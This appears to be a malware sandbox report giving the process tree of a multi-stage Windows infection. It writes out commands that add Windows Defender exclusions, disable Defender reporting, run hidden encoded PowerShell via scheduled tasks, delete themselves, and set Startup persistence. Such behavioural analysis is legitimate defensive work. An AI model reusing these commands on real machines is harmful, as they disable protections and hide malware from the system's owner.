C:\Users\Admin\AppData\Roaming\Routes\Routes.exe"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=1772 /prefetch:813⤵
-
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:213⤵
-
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=2020 /prefetch:813⤵
-
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2500 /prefetch:113⤵
-
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2580 /prefetch:113⤵
-
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3168 /prefetch:213⤵
-
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=3268 /prefetch:813⤵
-
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=516 /prefetch:813⤵
-
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=480 /prefetch:813⤵
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"10⤵
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",12⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",14⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\anytime1.exe"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"10⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"11⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\win.exe"C:\Users\Admin\AppData\Local\Temp\win.exe"12⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 1913⤵
-
C:\Users\Admin\AppData\Local\Temp\win.exeC:\Users\Admin\AppData\Local\Temp\win.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\win.exeC:\Users\Admin\AppData\Local\Temp\win.exe13⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5544 -s 12814⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\anytime2.exe"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"10⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"11⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\win.exe"C:\Users\Admin\AppData\Local\Temp\win.exe"12⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 1913⤵
-
C:\Users\Admin\AppData\Local\Temp\win.exeC:\Users\Admin\AppData\Local\Temp\win.exe13⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5404 -s 12414⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\anytime3.exe"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"10⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1388 -s 168811⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\IYEx72bTlmcph7YqkziCwtDG.exe"C:\Users\Admin\Pictures\Adobe Films\IYEx72bTlmcph7YqkziCwtDG.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im IYEx72bTlmcph7YqkziCwtDG.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\IYEx72bTlmcph7YqkziCwtDG.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im IYEx72bTlmcph7YqkziCwtDG.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Executes dropped EXE
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\eMd30NO5w6CXpLgXXFSPbQav.exe"C:\Users\Admin\Pictures\Adobe Films\eMd30NO5w6CXpLgXXFSPbQav.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla8⤵
-
C:\Windows\SysWOW64\cmd.execmd9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"10⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"10⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"10⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"10⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla10⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pifSta.exe.pif V10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Pictures\Adobe Films\C3TEUj3w0my3sG6vseSS1ODk.exe"C:\Users\Admin\Pictures\Adobe Films\C3TEUj3w0my3sG6vseSS1ODk.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\d7FUmlKnk_qRsOdIAuaf_SlZ.exe"C:\Users\Admin\Pictures\Adobe Films\d7FUmlKnk_qRsOdIAuaf_SlZ.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\fN_PuiaPiDkjEZnsupuHGsck.exe"C:\Users\Admin\Pictures\Adobe Films\fN_PuiaPiDkjEZnsupuHGsck.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe"C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe"C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 5369⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\X6dtQACQioqiebfEUtPmI4ox.exe"C:\Users\Admin\Pictures\Adobe Films\X6dtQACQioqiebfEUtPmI4ox.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 4648⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 4848⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\EeyZAYeCN3aiMcSvuVipi9sT.exe"C:\Users\Admin\Pictures\Adobe Films\EeyZAYeCN3aiMcSvuVipi9sT.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 4648⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 4728⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\mMCADPue24qpppaQrsAjgFjD.exe"C:\Users\Admin\Pictures\Adobe Films\mMCADPue24qpppaQrsAjgFjD.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS3CC3.tmp\Install.exe.\Install.exe8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS5DF7.tmp\Install.exe.\Install.exe /S /site_id "525403"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&11⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3212⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6412⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&11⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3212⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6412⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPKvXZNuC" /SC once /ST 04:23:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="10⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPKvXZNuC"10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPKvXZNuC"10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 18:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sOpKwDq.exe\" j6 /site_id 525403 /S" /V1 /F10⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\FmzEkQeE092RvzJXs6o8zx5r.exe"C:\Users\Admin\Pictures\Adobe Films\FmzEkQeE092RvzJXs6o8zx5r.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#618⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 9248⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 10368⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 10448⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 10768⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 10728⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 10848⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 10968⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\5DEw0GYq8p1VZbbph7v4UOlH.exe"C:\Users\Admin\Pictures\Adobe Films\5DEw0GYq8p1VZbbph7v4UOlH.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 23768⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue028a363eda.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue028a363eda.exeTue028a363eda.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02522f9ea0b1.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02522f9ea0b1.exeTue02522f9ea0b1.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 6005⤵
- Program crash
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\4D92.exeC:\Users\Admin\AppData\Local\Temp\4D92.exe2⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Confronto.vsd3⤵
-
C:\Windows\SysWOW64\cmd.execmd4⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"5⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^zsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDk$" Che.vsd5⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pifAvvelenate.exe.pif V5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pifC:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif6⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pifC:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Avvelenate.exe.pif6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 127⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 527⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\5DDF.exeC:\Users\Admin\AppData\Local\Temp\5DDF.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 4643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 4723⤵
- Program crash
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSmEbpnuyD.url" & echo URL="C:\Users\Admin\AppData\Local\Temp\aYSXsebblL\wyTKUHhh.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSmEbpnuyD.url"2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2088 -ip 20881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1828 -ip 18281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3624 -ip 36241⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4964 -ip 49641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4880 -ip 48801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4964 -ip 49641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4880 -ip 48801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4828 -ip 48281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4892 -ip 48921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3124 -ip 31241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4828 -ip 48281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4828 -ip 48281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4828 -ip 48281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1816 -ip 18161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4828 -ip 48281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4296 -ip 42961⤵
-
C:\Users\Admin\AppData\Roaming\dtufvraC:\Users\Admin\AppData\Roaming\dtufvra1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4828 -ip 48281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 31241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4296 -ip 42961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4828 -ip 48281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3124 -ip 31241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4296 -ip 42961⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 524 -p 5740 -ip 57401⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3124 -ip 31241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4296 -ip 42961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4828 -ip 48281⤵
-
